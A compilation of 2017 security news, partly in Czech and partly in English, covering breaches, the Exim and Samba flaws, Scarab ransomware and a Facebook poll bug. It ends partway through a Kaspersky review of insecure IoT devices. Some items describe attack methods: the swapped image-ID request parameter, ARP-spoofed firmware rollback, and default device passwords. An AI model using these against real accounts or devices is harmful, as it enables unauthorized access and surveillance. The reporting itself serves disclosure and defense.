Kromě samotného faktu, že si tak velký telekomunikační operátor něco takového dovolil, je zarážející i zjištění, že vůbec má v síti nasazené zařízení, které takovéto zásahy umožňuje. Všechny doposud hypotetické úvahy o možnosti monitorování a transparentního pozměňování nešifrovaného provozu poskytovatelem přístupu k Internetu tak nyní dostávají naprosto reálné obrysy. Došlo tak k definitivnímu vyvrácení tradičního mýtu, že HTTPS je zbytečné pro čistě informační weby, kam se nikdo nepřihlašuje. Jednoduše HTTPS by mělo být všude.

Jak píše web DSL.sk, protokol HTTPS poněkud podcenili kolegové ze slovenské pobočky O2, kteří zorganizovali obdobnou akci. Na rozdíl od českého operátora webový server toho slovenského na adrese https://o2.sk posílá hlavičku HTTP Strict-Transport-security, která po dobu dvou let vynucuje použití HTTPS na všechny subdomény. No a vzhledem k tomu, že captive portál byl provozován na takové subdoméně, ale přitom HTTPS nepodporoval, zobrazila se některým uživatelům ze Slovenska při přístupu na zahraniční stránky pouze chybová zpráva, že web není dostupný.

Jak bezpečný je Android Pay?
Platební karty J & T Banky v aplikaci Android Pay. (14. 11. 2017)
Autor: Dalibor Z. Chvátal
Platební karty J & T Banky v aplikaci Android Pay. (14. 11. 2017)

Služba Android Pay, která umožňuje jednoduché placení v obchodech prostřednictvím NFC, přišla i do Česka. Využívá funkci zvanou Host-based Card Emulation, která je dostupná v Androidu od verze 4.4. Tato funkce umožňuje aplikaci v telefonu přímo komunikovat s čtečkou bezkontaktních karet v poli NFC antény. Na rozdíl od předchozích řešení se tak eliminuje nutnost mít v zařízení tzv. secure element nebo speciální SIM kartu, která by prováděla kryptografické operace a bezpečně držela privátní klíče. Ty jsou nyní doručovány přes internet v podobě tzv. tokenů, kdy každý token je použitelný pouze pro jednu transakci.

Systém NFC plateb pomocí HCE není v Česku nový, představila jej už minulý rok ČSOB, následovaná Komerční bankou. Systém Android Pay se od těchto řešení liší především posunutím hranice bezpečnosti zase o něco níže. Zatímco dříve uvedené aplikace vyžadují pro platbu zadání speciálního PINu aplikace, případně použití otisku prstu a pouze jako doplňkovou službu nabízejí rychlé placení bez odemykání telefonu, Android Pay tento model obrací tak, že k platbám menších částek (zřejmě do 500 Kč) stačí pouze rozsvítit displej telefonu, pro platbu vyšších částek pak stačí pouze odemknout zámek displeje. Vzhledem k tomu, jak triviální bývají odemykací sekvence většiny uživatelů, se takové zabezpečení virtuální karty nezdá jako dostatečné.

Aplikace se také brání odcizení platebních tokenů tak, že se snaží detekovat nejen root oprávnění, ale na některých modelech telefonů i samotné odemčení zavaděče či použití alternativní ROM a v takovém případě se odmítne spustit. Uživatelé starších přístrojů, jejichž podpora ze strany výrobce už skončila, tak mají těžkou volbu, zda používat aktuální operační systém, jakým je například LineageOS a o možnost placení telefonem přijít, nebo zůstat u originálního firmwaru se známými zranitelnostmi, kde Android Pay funguje.

Nové vydání OWASP Top 10 zranitelností webových aplikací
Po čtyřech letech vydal projekt OWASP nový seznam 10 nejčastějších zranitelností webových aplikací. Na prvních dvou místech se pořadí nezměnilo, největšími problémy jsou stále Injection a chyby autentizace. Na třetí místo se ze šestého přesunulo vyzrazení citlivých dat. Obecně zpráva také hodnotí, že v poslední době jsou na vzestupu mikroslužby, které představují proti tradičním monolitickým webovým aplikacím nové bezpečnostní výzvy.

Dále je konstatováno, že dominantním jazykem se stává JavaScript, který se jednak používá na klientovi, kde často nahrazuje tradičnější zpracování požadavků na straně serveru, jednak i na serverech díky projektům jako Node.js.

Porovnání seznamu Top10 2013 a 2017

A zase ty úniky
Minulý týden vyšlo najevo, že v říjnu 2016 došlo k úniku dat společnosti Uber. Útočníci se nějakým způsobem dostali k privátnímu repozitáři na GitHubu, ve kterém objevili přihlašovací jméno a heslo pro Amazon Web Services. V tomto úložišti bylo uloženo na 57 milionů osobních údajů zákazníků a řidičů, včetně 600 tisíc čísel řidičských průkazů. Ačkoli měla společnost povinnost o takovém úniku informovat federální úřady Spojených států, namísto toho zaplatila útočníkům sto tisíc dolarů za odstranění dat a celý incident ututlala. Jakou měla záruku, že k vymazání dat skutečně došlo, můžeme jen spekulovat.

O pár dní později se k podobnému úniku přiznala společnost Czechia.com. Únik se týká 6500 zákaznických účtů a byl zřejmě způsoben jistým zákazníkem, který objevil a zneužil chybu v zabezpečení managed serverů, kterými bylo možné získat interní databázi. Kuriózní je i způsob, jakým byl únik odhalen: Michal Špaček jej objevil náhodou, když hledal na webu SHA-1 hashe často používaných hesel.

Děravý procesor v procesoru
Je známou věcí, že v procesorech firmy Intel se od jisté doby vyskytuje další kompletní počítač zvaný Management Engine, ve kterém běží operační systém MINIX. Tento počítač provádí zejména servisní činnosti pro hlavní procesor, dále pak volitelně umožňuje vzdálenou správu, včetně přístupu ke konzoli hlavního počítače. Jeho možnosti zasahovat do činnosti hlavního procesoru jsou tedy téměř neomezené a jeho napadení by mohlo v nejhorším případě znamenat i zcela nedetekovanou kompromitaci.

Intel na základě nedávného auditu vydal opravu firmware a třese se, jaké další zranitelnosti ještě výzkumníci objeví. Oprava se obvykle distribuuje jako aktualizace BIOSu, je tedy třeba sledovat informace výrobce počítače. Není divu, že s takovým stavem se spousta uživatelů nespokojí a pokouší se nahradit proprietární firmware z co největší části open source softwarem.

Čtyři devítky nabízí soukromí i bezpečnost v DNS
Společnosti IBM, Packet Clearing House a Global Cyber Alliance nedávno představily projekt Quad 9. Ten nabízí veřejný rekurzivní DNS resolver na dobře zapamatovatelné IPv4 adrese 9.9.9.9 (IPv6 varianta 2620:fe::fe už tak jednoduchá k zapamatování není), který kromě ochrany soukromí – tvrdí, že nezaznamenávají žádné informace o uživatelích – nabízí také ochranu před škodlivými doménovými jmény, která slouží například ke komunikaci botnetů.

Služba je provozovaná prostřednictvím globálního anycastu ve více než stovce lokalit, plně podporuje IPv4 i IPv6 a také provádí validaci DNSSEC podpisů. V okamžiku oznámení služba nevalidovala ECDSA podpisy, tento problém však již byl odstraněn. V zájmu ochrany soukromí uživatelů služba dle svých slov neposílá autoritativním serverům rozšíření EDNS Client-Subnet, což velmi pravděpodobně způsobí neoptimální doručování obsahu z CDN sítí; zvlášť vzhledem k tomu, že podle našeho pozorování je vnější adresa nebližšího uzlu této služby až v USA.

Je na čase vypnout SMB verze 1
Minulý týden byla také odhalena zranitelnost balíku Samba ve všech verzích od 4.0.0. Chyba se týká implementace zastaralého protokolu SMB1 a umožňuje potenciálně spustit vlastní kód na serveru. Kromě aktualizace je možné problém vyřešit také vypnutím podpory zastaralého protokolu; to ostatně radí i odborník ze společnosti Microsoft.

Jedinými legitimními důvody, proč je potřeba SMBv1 držet, může být podpora Windows XP nebo Windows Server 2003, závislost softwaru na funkci Okolní počítače, případně podpora starých kopírek s funkcí Scan-to-share. Naopak nejnovější verze Windows už přichází bez podpory SMBv1.

Linus Torvalds: bezpečnostní problémy jsou jen chyby
V e-mailové konferenci vývojářů Linuxu se Linus Torvalds svým stylem ostře ohradil proti způsobu, jakým se někteří vývojáři snaží do zdrojového kódu protlačit bezpečnostní hardening.

NENÍ MOŽNÉ, aby si bezpečáci vymýšleli nějaká nová magická pravidla a nechali jádro zhavarovat, kdykoli dojde k jejich porušení.

Zdůrazňuje, že i bezpečnostní problémy jsou jen obyčejné chyby a primární úlohou hardeningu tedy má být takové chyby najít a upozornit na ně. Teprve po určité době, kdy je zřejmé, že nově zavedená omezení nezpůsobují problémy ve všech běžných podmínkách je možné zvážit zavedení drastičtějších opatření.

Pro pobavení
Half past twelve
And I'm watchin' the late show
In my flat all alone
How I hate to spend the evening on my own

Gimme, gimme, gimme a man after midnight
Won't somebody help me chase the shadows away
Kdo by neznal skladbu skupiny ABBA z roku 1979. Ovšem jen málokoho při poslechu textu napadne, že osamělá hrdinka sledující noční televizní vysílání v půl jedné ráno vlastně touží po čtení unixových manuálových stránek. Nevinný žertík, který tuhle skladbu připomíná, bohužel rozbíjí neinteraktivní volání příkazu man s přepínačem -w , a tak byl nakonec odstraněn. Ostatně, ať děláte co děláte, vždycky někomu znemožníte práci.

Autor: Randall Munroe, překlad xkcz.cz, podle licence: CC BY-NC 2.5


Službě Imgur unikly e-maily a hesla uživatelů, tři roky o tom nevěděla
27.11.2017 Lupa.cz Incidenty
Populární stránce Imgur, na které se ukládají obrázky, byly ukradeny přihlašovací e-maily a hesla k 1,7 milionu uživatelských účtů. Stalo se tak už v roce 2014, Imgur o tom nicméně dlouho nevěděl a o věci se dozvěděl až před pár dny. Nyní firma záležitost rozebírá na svém blogu.

Necelé dva miliony uživatelů jsou malá část registrovaných uživatelů Imgur, ten jich celkem má asi 150 milionů. Služba napadeným uživatelům hesla resetuje a o incidentu je postupně informuje.

Imgur prozatím nemá přesné informace, jak k úniku došlo. Provádí se šetření, které pak má vést také ke spolupráci s policií a úřady.

„Vždy jsme vaše hesla v naší databázi šifrovali, mohla ale být cracknuta pomocí brute force kvůli použití staršího algoritmu (SHA-256), který jsme tehdy používali. Algoritmus jsme v loňském roce aktualizovali na bcrypt,“ píše Imgur.


Researcher found a vulnerability in Facebook polls that allowed removal of any photo
27.11.2017 securityweek Social

The Iran-based security researcher Pouya Darabi discovered a method to delete any photo from Facebook exploiting a flaw in the polling feature.
The Iran-based security researcher Pouya Darabi received a $10,000 bounty from Facebook after reporting a critical vulnerability that could have been exploited to delete any photo from the social network.

Early this month, the social network giant announced a new feature for posting polls that include images and GIF animations. Darabi analyzed the new feature and discovered that it is affected by a vulnerability easily exploitable.

The expert analyzed the request sent to Facebook servers when a user creates a poll and discovered the presence of the identifiers of the image files added to the poll.

Facebook polls flaw

Replacing the image ID in the request with the ID of any photo on the social network it possible to set the image for the poll.

Darabi then discovered once the user that created the poll has deleted the post, the image whose ID was added to the request would also get removed from the social network.

“When this field value changes to any other images ID, that image will be shown in poll. After sending request with another user image ID, a poll containing that image would be created.” explained the researcher that published a video PoC.

“At the end when we try to delete the poll, victim’s image would be deleted with it by facebook as a poll property.”

Darabi reported the flaw to Facebook on November 3, the company issued a temporary fix in the same day. The permanent fix was completed in November 5, and on November 8 the expert received a $10,000 Bounty award.

Back in 2015, Darabi was awarded $15,000 for bypassing the Facebook cross-site request forgery (CSRF) protection systems, in 2016 he received another $7,500 award for a similar bug.


Gladius Shows Promise in Utilizing Blockchain Tech to Fight Hackers
27.11.2017 thehackernews  Hacking


Image Credit: Pixelbay
Blockchain startups are cropping up left and right aiming to disrupt existing services and business models.
These range from the trivial to potentially game-changing solutions that can revolutionize the internet as we know it. Among those that promise to change the world, most are attempting to reconstruct the entire internet infrastructure into something that is decentralized, secure, scalable, and tokenized.
There are also those that aim to solve the most significant problems plaguing the digital world, particularly potentially costly and tedious security issues. We do not lack for dangers, ranging from data breaches to denial-of-service attacks, and other hacks.
For the most part, there are capable SaaS and software-defined services that are capable enough in addressing the threats that involve malware and DDoS.
However, blockchains offer much much more.
The plague of DDoS
Distributed denial-of-service or DDoS attacks involve a malicious hacker deploying a network of infected computers in sending traffic and making queries to the target host. By deploying a botnet with potentially thousands of unique devices, it is difficult to block on a per-IP basis.
Oftentimes, without adequate protection, a DDoS attack can slow down a website or service to a crawl until it is no longer accessible either by running out of bandwidth allocation or simply being overwhelmed with traffic.
According to this DDos Impact survey, almost half of respondents say they have encountered a DDoS attack, with more than 90 percent of these businesses being attacked a span of 12 months.
The average DDoS attack lasted between 6 to 24 hours, and at the cost of $40,000 per hour, these cost businesses about $500,000 per attack on average, with some even costing more for larger enterprises.
For small businesses, the cost can be more severe, especially for those that depend solely on their online operations and sales to thrive.
These are only the costs associated with IT activity. When a website goes down, all its business goes down with it – this can be particularly troublesome for a company running an e-commerce website or a consumer-facing application.
Blockchain-based solutions for DDoS
Sadly, a DDoS attack is something that cannot be prevented. You can only mitigate its effects, and your infrastructure can merely ward off the excessive traffic and bandwidth utilization through several means. For the most part, deploying DDoS protection entails deflecting any botnet traffic, so that your main server or cloud deployment is not overloaded.
As earlier mentioned, cloud-based DDoS protection acts as a barrier between the main server and the internet-at-large Whenever an attack occurs, the service efficiently “absorbs” the traffic to minimize the impact on the infrastructure itself.
This can only go so far, however. Even the most robust of cloud infrastructures can just handle so much traffic. Besides, for businesses, the costs involved could be overwhelming.
Here is where a blockchain and a highly distributed approach can offer more value.
Gladius, a blockchain service for DDoS prevention and website acceleration aims to leverage on its global network of individual and independent nodes in mitigating the effects of a DDoS attack and caching content all across the world to make the website load faster.
Being a decentralized network, users can rent out their spare bandwidth through a desktop client and earn money by sharing their bandwidth. Then, their excess bandwidth is distributed to nodes which in turn funnel the bandwidth to websites under DDoS attacks to make sure they stay up.
During “peace time” or periods without a DDoS, Gladius’ network also speeds up access to the internet by acting as a content delivery network, wherein web content is cached for faster delivery to the target client’s browser.
The perks of a peer-to-peer network

Image Credit: Gladius
A decentralized network has additional benefits beyond the simple cloud-based deployment.
While a cloud is, to some extent, distributed, it is still owned by whoever runs the platform. In contrast, a blockchain runs completely off of a decentralized network, wherein the nodes are independently owned.
Herein lies the additional benefit.
With most blockchains, nodes are rewarded through a tokenized incentive scheme – it is the same with Gladius. Individual computer owners can earn cryptocurrency tokens whenever their resources are shared with the network.
Toward a decentralized sharing economy
Blockchain startups are representative of where we are heading in the future: a truly decentralized sharing economy. We have had a glimpse of such sharing economies with platforms like Uber, Airbnb, and the like.
However, these foster a sharing economy without the decentralized aspect – the platform is still owned by a corporate entity, for instance.
With blockchain startups, the sharing economy is built entirely upon the independent and decentralized nodes that make up the network.
Bitcoin proved that we could have an exchange of value through a decentralized system. Ethereum proved we could establish self-executing smart contracts without third parties or mediums.
With solutions like Gladius, we are likewise hopeful that the internet’s infrastructure can be disrupted for the benefit of both users and business that build value.


Exim Internet Mailer Found Vulnerable to RCE And DoS Bugs; Patch Now
27.11.2017 thehackernews  Vulnerebility

A security researcher has discovered and publicly disclosed two critical vulnerabilities in the popular Internet mail message transfer agent Exim, one of which could allow a remote attacker to execute malicious code on the targeted server.
Exim is an open source mail transfer agent (MTA) developed for Unix-like operating systems such as Linux, Mac OSX or Solaris, which is responsible for routing, delivering and receiving email messages.
The first vulnerability, identified as CVE-2017-16943, is a use-after-free bug which could be exploited to remotely execute arbitrary code in the SMTP server by crafting a sequence of BDAT commands.
"To trigger this bug, BDAT command is necessary to perform an allocation by raising an error," the researcher said. "Through our research, we confirm that this vulnerability can be exploited to remote code execution if the binary is not compiled with PIE."
The researcher (mehqq_) has also published a Proof-of-Concept (PoC) exploit code written in python that could allow anyone to gain code execution on vulnerable Exim servers.
The second vulnerability, identified as CVE-2017-16944, is a denial of service (DoS) flaw that could allow a remote attacker to hang Exim servers even the connection is closed by forcing it to run in an infinite loop without crashing.
The flaw exists due to improper checking for a '.' character to signify the end of an email when parsing the BDAT data header.
"The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' character signifying the end of the content, related to the bdat_getc function," the vulnerability description reads.
The researcher has also included a proof-of-concept (PoC) exploit for this vulnerability as well, making Exim server run out of stack and crash.
Both vulnerabilities reside in Exim version 4.88 and 4.89, and sysadmins are recommended to update their mail transfer agent application Exim version 4.90 released on GitHub.


World's Biggest Botnet Just Sent 12.5 Million Emails With Scarab Ransomware
27.11.2017 thehackernews  BotNet

A massive malicious email campaign that stems from the world's largest spam botnet Necurs is spreading a new strain of ransomware at the rate of over 2 million emails per hour and hitting computers across the globe.
The popular malspam botnet Necrus which has previously found distributing Dridex banking trojan, Trickbot banking trojan, Locky ransomware, and Jaff ransomware, has now started spreading a new version of Scarab ransomware.
According to F-Secure, Necurs botnet is the most prominent deliverer of spam emails with five to six million infected hosts online monthly and is responsible for the biggest single malware spam campaigns.
Scarab ransomware is a relatively new ransomware family that was initially spotted by ID Ransomware creator Michael Gillespie in June this year.
Massive Email Campaign Spreads Scarab Ransomware

According to a blog post published by security firm Forcepoint, the massive email campaign spreading Scarab ransomware virus started at approximately 07:30 UTC on 23 November (Thursday) and sent about 12.5 million emails in just six hours.
The Forcepoint researchers said "the majority of the traffic is being sent to the .com top-level domain (TLD). However, this was followed by region-specific TLDs for the United Kingdom, Australia, France, and Germany."
The spam email contains a malicious VBScript downloader compressed with 7zip that pulls down the final payload, with one of these subject lines:
Scanned from Lexmark
Scanned from Epson
Scanned from HP
Scanned from Canon
As with previous Necurs botnet campaigns, the VBScript contained a number of references to the widely watched series Game of Thrones, like the strings 'Samwell' and 'JohnSnow.'
The final payload is the latest version of Scarab ransomware with no change in filenames, but it appends a new file extension with ".[suupport@protonmail.com].scarab" to the encrypted files.
Once done with the encryption, the ransomware then drops a ransom note with the filename "IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT" within each affected directory.
The ransom note does not specify the amount being demanded by the criminals; instead, it merely states that "the price depends on how fast you [the victim] write to us."
However, Scarab ransomware offers to decrypt three files for free to prove the decryption will work: "Before paying you can send us up to 3 files for free decryption."
Protection Against Ransomware
To safeguard against such ransomware infection, you should always be suspicious of any uninvited document sent over an email and should never click on links provided in those documents unless verifying the source.
Most importantly, keep a good backup routine in place that makes their copies to an external storage device that is not always connected to your PC in order to always have a tight grip on all your important files and documents.
Moreover, make sure that you run an active anti-virus solution on your system, and always browse the Internet safely.


Another Facebook Bug Allowed Anyone to Delete Your Photos

27.11.2017 thehackernews  Social

If you think a website whose value is more than $500 billion does not have any vulnerability in it, then you are wrong.
Pouya Darabi, an Iranian web developer, discovered and reported a critical yet straightforward vulnerability in Facebook earlier this month that could have allowed anyone to delete any photo from the social media platform.
The vulnerability resides in Facebook's new Poll feature, launched by the social media giant earlier this month, for posting polls that include images and GIF animations.
Darabi analyzed the feature and found that when creating a new poll, anyone can easily replace the image ID (or gif URL) in the request sent to the Facebook server with the image ID of any photo on the social media network.

 

Now, after sending the request with another user image ID (uploaded by someone else), that photo would appear in the poll.
"Whenever a user tries to create a poll, a request containing gif URL or image id will be sent, poll_question_data[options][][associated_image_id] contains the uploaded image id," Darabi said. "When this field value changes to any other images ID, that image will be shown in poll."
Apparently, if the creator of the poll deletes that post (poll), as demonstrated in the video above, it would eventually delete the source photo as well, whose image ID was added to the request—even if the poll creator doesn't own that photo.
The researcher said he received $10,000 as his bug bounty reward from Facebook after he responsibly reported this vulnerability to the social media network on November 3. Facebook patched this issue on November 5.
This isn't the first time when Facebook has been found dealing with such a vulnerability. In the past, researchers discovered and reported several issues that let them delete videos, photo albums, and comments and modify messages from the social media platform.
Darabi has also previously been awarded by Facebook with a $15,000 bug bounty for bypassing its cross-site request forgery (CSRF) protection systems (in 2015) and another $7,500 for a similar issue (in 2016).


IoT lottery: finding a perfectly secure connected device
27.11.2017 Kaspersky IoT
Black Friday and Cyber Monday are great for shopping. Vendors flood the market with all kinds of goods, including lots of exciting connected devices that promise to make our life easier, happier and more comfortable. Being enthusiastic shoppers just like many other people around the world, at Kaspersky Lab we are, however paranoid enough to look at any Internet of Things (IoT)-device with some concern, even when the price is favorable. All because there is little fun in buying a coffeemaker that would give up your home or corporate Wi-Fi password to an anonymous hacker, or a baby-monitor that could livestream your family moments to someone you most definitely don’t want it livestreamed to.

It is no secret that the current state of security of the IoT is far from perfect, and in buying one of those devices you are potentially buying a digital backdoor to your house. So, while preparing for IoT-shopping this year, we asked ourselves: what are our chances of buying a perfectly secure connected device? To find the answer, we conducted a small experiment: we randomly took several different connected devices and reviewed their security set up. It would be an exaggeration to say that we conducted a deep investigation. This exercise was more about what you’d be able to see at first glance if you had a clue about how these things should and shouldn’t work. As a result we found some rather worrying security issues and a few, less serious, but unnecessary ones.

We looked at the following devices: a smart battery charger, an app-controlled toy car, an app-controlled smart set of scales, a smart vacuum cleaner, a smart iron, an IP camera, a smart watch, and a smart home hub.

Smart Charger
The first device we checked was the smart charger that attracted us with its built-in Wi-Fi connectivity. You may ask yourself: who would need a remotely controlled battery charger, especially when you need to manually set the battery to charge? Nevertheless, it exists and it allows you not only to charge the battery, but to manage the way you charge it. Like a boss.

The device we tested charges and restores most types of batteries with a nominal voltage from 3 to 12 volts. It has a Wi-Fi module, which allows the device owner to connect remotely to control the charging process, to change the charging settings and to check how much electricity the battery is storing at any time.
 

Once turned on, the device switches by default to ‘access point’ mode. The user should then connect to the device and open the management interface web page. The connection between the charger and the device you use to access the management panel uses the outdated and vulnerable WEP algorithm instead of WPA2. However it is password protected. Having said that, the predefined password is ‘11111’ and it is actually written in the official documentation that comes with the device and is searchable online. However, you can change the password to a more secure one. Having said that, the length of the password is limited, for some reason, to five symbols. Based on the information available here, it would take four minutes to crack such a password. In addition to that the web interface of the device itself has no password protection at all. It is available as is, once it is connected to your home Wi-Fi network.

Who would attack a smart charger anyway, you may well ask, and you would probably be right as there are likely few black hat hackers in the world who would want to do that. Especially when it requires the attacker to be within range of the Wi-Fi signal or have access to your Wi-Fi router (which, by the way, is a much bigger problem). On the other hand, the ability to interfere with how the battery is charging, or randomly switching the parameters could be considered as worth a try by a wicked person. The probability of real damage, like setting fire to the battery or just ruining it is heavily dependent on the type of battery, however the attack can be performed just for lulz. Just because they can.

To sum up: most likely when using this device, you won’t be in constant danger of a devastating remote cyberattack. However, if your battery eventually catches fire while charging, it could be a sign that you have a hacker in your neighborhood, and you have to change the password for the device. Or it could be the work of a remote hacker, which probably means that your Wi-Fi router needs a firmware update or a password change.

Smart App-Controlled Wireless Spy Vehicle
While some people are looking for useful IoT features, other seek entertainment and fun. After all, who didn’t dream of their own spying toolset when they were young? Well, a Smart App-Controlled Wireless Spy Vehicle would have seemed a dream come true.

This smart device is actually a spy camera on wheels, connected via Wi-Fi and managed via an application. The spy vehicle, sold in toy stores, has Wi-Fi as the only connection interface. For management there are two official applications, for iOS and Android. We assumed that there could be a weakness in the Wi-Fi connections – and we turned out to be right.
 

The device is able to execute the following commands:

Move across the area (with multiple riding modes, it is possible to control speed and direction)
View an image from the navigation camera during movement, for ease of navigation
View an image from the main camera, which can also be rotated in different directions (there is even a night vision mode)
Record photos and videos that are stored in the phone’s memory
Play audio remotely via a built-in speaker
Once connected to a phone, it becomes a Wi-Fi access point without password requirements. In other words, any person connected to it can send remote commands to the vehicle – you’d just need to know which commands to send. And if you – being a bit concerned about the lack of password protection in a child’s toy that has spying capabilities – decided to set one up, you’d find there was no opportunity to do so. And if you have basic network sniffing software on your laptop, and decided you’d like to see what the vehicle was currently filming, you’d be able to intercept the traffic between the vehicle and the controlling device.

That said, a remote attack is not possible with this device, and an offensive third-party would have to be within the range of the toy’s Wi-Fi signal which should be enabled. But on the other hand, nothing prevents an attacker from listening to your traffic in a passive mode and catching the moment when the device is used. So if you have seen someone with a Wi-Fi antenna near your house recently, chances are they’re curious about your private life, and have the means to look into it.

Smart Robo Vacuum Cleaner. With camera
Speaking of other devices with cameras that are around you, we spent some time trying to figure out why a smart vacuum cleaner would need to have a web-cam – is it for the macro filming of dust? Or to explore the exciting under-bed world? Joking aside, this function was made specifically for the cleaning enthusiast: if you find it exciting to control the vacuum cleaner manually while checking exactly what it’s doing, this is the gadget for you. Just keep in mind that it is not quite secure.
 

The device is managed via a specific application – you can control the cleaner’s movement, get video live-streaming while it’s cleaning, take pictures, etc. The video will disappear after streaming, while photos are stored in the application.

There are two ways to connect to the device via Wi-Fi:

With the cleaner as access point. If you don’t have a Wi-Fi network in your home, the device will provide the connection itself. You simply connect to the cleaner via the mobile application – and off you go!
The cleaner can also work as a Wi-Fi adapter, connected to an existing access point. After connecting to the cleaner-as-access-point you can then connect the device to your home Wi-Fi network for better connection and operation radius.
As the device is managed via a mobile phone application, the user should first go through some kind of authorization. Interestingly enough, for this they only need to enter a weak default password – and that’s it. Thus, an attacker just needs to connect to cleaner’s access point, type in the default password to authorize themselves in the application for pairing the mobile phone and the cleaner. After the pairing is completed, they can control the device. Also, after connection to a local network, the robot vacuum cleaner will be visible in the local network and available via a telnet protocol to anyone who is also connected to this network. Yes, the connection is password protected, which can be changed by the owner of the device (but really, who does that?!), and no, there is no brute force protection in place.

Also the traffic between the app and the device is encrypted, but the key is hard-coded into the app. We are still examining the device, and the following statement should be taken with a big grain of salt, but potentially a third-party could download the app from Google Play, find the key and use it in a Man-in-the-Middle attack against the protocol.

And, of course, like any other Android-app controlled connected device, the robot vacuum cleaner is a subject to attack via rooting malware: upon gaining super user rights, it can access the information coming from the cleaner’s camera and its controls. During the research, we also noticed that the device itself runs on a very old version of Linux OS, which potentially makes it subject to a range of other attacks through unpatched vulnerabilities. This, however, is the subject of ongoing research.

Smart Camera
IP cameras are the devices targeted most often by IoT-hackers. History shows that, besides the obvious unauthorized surveillance, this kind of device can be used for devastating DDoS-attacks. Not surprisingly, today almost any vendor producing such cameras is in the cross-hairs of hackers.

In 2015, our attempt to evaluate the state of security of consumer IoT took a look at baby monitor; this year we’ve focused on a rather different kind of camera: the ones used for outside surveillance – for example the ones you’ve put up in your yard to make sure neighbors don’t steal apples from your trees.
 

Originally, the device and its relatives from the same vendor were insecure due to a lack of vendor attention to the problem. But the issue of camera protection changed dramatically around 2016 after reports of unauthorized access to cameras became publicly known through a number of publications like here or here.

Previously, all the cameras sold by this vendor were supplied with a factory default account and default password ‘12345’. Of course, users tended not to change the password. In 2016, the picture changed radically when the vendor became an industry pioneer in security issues, and started to supply cameras in ‘not activated’ mode. Thus, there was no access to the camera before activation. Activation required the creation of a password and some network settings. Moreover, the password was validated in terms of basic complexity requirements (length, variety of characters, numbers and special characters). Activation of the camera could be performed from any PC with access to the camera over the local network.

Since this reform, updating the firmware on a camera with a default password leads to the camera demanding a password change and warning the user about security issues every time they connect. The password requirements are quite solid:
 

Additionally, protection from password brute forcing has been implemented:
 

Moreover, the vendor added a new security feature to the firmware in 2016. This involves protection against brute forcing, by automatically blocking access for an IP address after five to seven attempts to enter the wrong password. The lock is automatically removed after 30 minutes. The feature, which is enabled by default, significantly increases the level of security.

Nevertheless, not everything is perfect in the camera. For instance, the exchange of data with the cloud is performed via HTTP, with the camera’s serial number as its ID. This obviously makes Man-in-the-Middle attacks more realistic.

In addition to a standard WEB interface for such devices, there is a specialized tool for camera configuration, which can search for cameras on the network, display data on the cameras, and perform basic settings including activation, password changes, and the implementation of password resets for network settings. When triggering the device search the PC sends a single Ethernet frame.

The camera’s response is not encrypted, and contains model information such as the firmware, date reset and network settings. Since this data is transmitted in a non-encrypted way and the request does not have authorization, this one Ethernet package can detect all cameras on the network and obtain detailed information about them. The algorithm has one more weakness: when forming a response, time delays are not considered. As a consequence, it is easy to organize a DDoS attack in the network, sending such requests to all cameras within the presented Ethernet network .

Apart from the described specific protocol, cameras support a standard SSDP protocol for sending notifications, and this allows any software or hardware to automatically detect the cameras. This SSDP data also contains information about the model and serial number of the camera.

One more attack vector lies in the remote password reset, which is supported by a technical support service. Anyone with access to the camera’s network can select a camera through the specialized tool for camera configuration and request the reset procedure. As a result, a small file containing the serial number of the camera is created. The file is sent to the technical support service, which then either refuses the request or sends a special code to enter a new password. Interestingly enough, the service doesn’t even try to check whether the user is the owner of the camera – outdoor surveillance assumes that the camera is located out of reach, and it is almost impossible to identify remotely the author of the request. In this scenario, an insider cybercriminal attack is the most probable vector.

To sum up: luckily this is not the worst camera we’ve ever seen when it comes to cybersecurity; however, some unnecessary issues are still there to be exploited by an offensive user.

Smart Bathroom Scales
Remember that picture from the internet, where hacked smart scales threaten to post their owner’s weight online if they don’t pay a ransom? Well, joking aside we’ve proved this may be possible!
 

This is a smart device, interacting with a smartphone app via Bluetooth, but it is also equipped with a Wi-Fi module. This connectivity provides the owner with a number of additional features, from weight monitoring on a private website secured by a password to body analysis and integration with various healthcare apps. Interestingly enough, the only Wi-Fi-enabled feature is the receiving of weather updates.

We decided to test the possibility of arbitrary updates\software installation on the specified device in LAN using ARP spoofing and the implementation of Man-in-the-Middle attacks. Here’s what we found.
 

The mobile phone interacts with the main server via HTTPS, in a series of queries. The scales themselves are connected to the mobile phone via Bluetooth. The process of pairing is simple: you request connection via the application, and then turn the scales’ Bluetooth connection on. Given the very limited time for this stage, it is very unlikely that someone will be able to pair the devices without the user’s knowledge.

Among other things, the device transmits via Bluetooth various user data – mail, indication of weight, etc. The device receives updates via the application. The latter sends the current version of updates and a number of other parameters to the server – the server, in turn, passes to the application a link to the downloaded file and its checksum.

However the updates are provided as is, on the HTTP channel, without encryption, and the updates themselves are also not encrypted. Thus, if you are able to listen to the network to which the device is connected you would be able to spoof the server response or the update itself.

This enabled us to, firstly, ‘roll back’ the version of the updates, and then install a modified version that does not match the one retrieved from the server. In this scenario, the further development of attacks is possible, like installing arbitrary software on the device.

The good news is that this device has no camera, so even if any other severe vulnerabilities are found, you are safe. Besides that, who would want to spend time on hacking smart scales? Well, the concern is a valid one. First of all, see the picture at the beginning of this text, and secondly: as we already mentioned above, sometimes hackers do things just because they can, because certain things are just fun to crack.

Smart Iron
Fun to crack – that is something you can definitely say about a smart iron. The very existence of such a device made us very curious. The list of things you could potentially do should a severe vulnerability be found and exploited looked promising. However, the reality turned out to be rather less amusing. Spoiler: based on our research it is impossible to set fire to the house by hacking the iron. However, there are some other rather interesting issues with this device.

The iron has a Bluetooth connection that enables a number of remote management options through a mobile app. We assumed that communication with the server would be insecure, allowing someone to take control of the device and its sensitive data, as manufacturers would not be paying enough attention to the protection of this channel, believing that a smart iron would be of little value to an attacker.

Once it is connected to the user’s mobile phone, the iron is managed via the application, which exists in versions for both iOS and Android. The app allows you to:

View the orientation of the iron (whether it is lying flat, standing, or hanging by its cable)
Disable (but – sadly – not enable) the iron
Activate ‘safe mode’ (in which iron does not react to a mechanical switch on. To turn the iron on when it is in that mode you need to turn off safe mode in the app).
In terms of on/off safety the iron automatically switches off if it is stationary for five seconds in a ‘lying’ position, or for eight minutes in a ‘standing’ position.

The iron can also be controlled via the internet. For this, it is necessary to have a gateway near the device, like a separate smartphone or tablet with internet access and a special app.

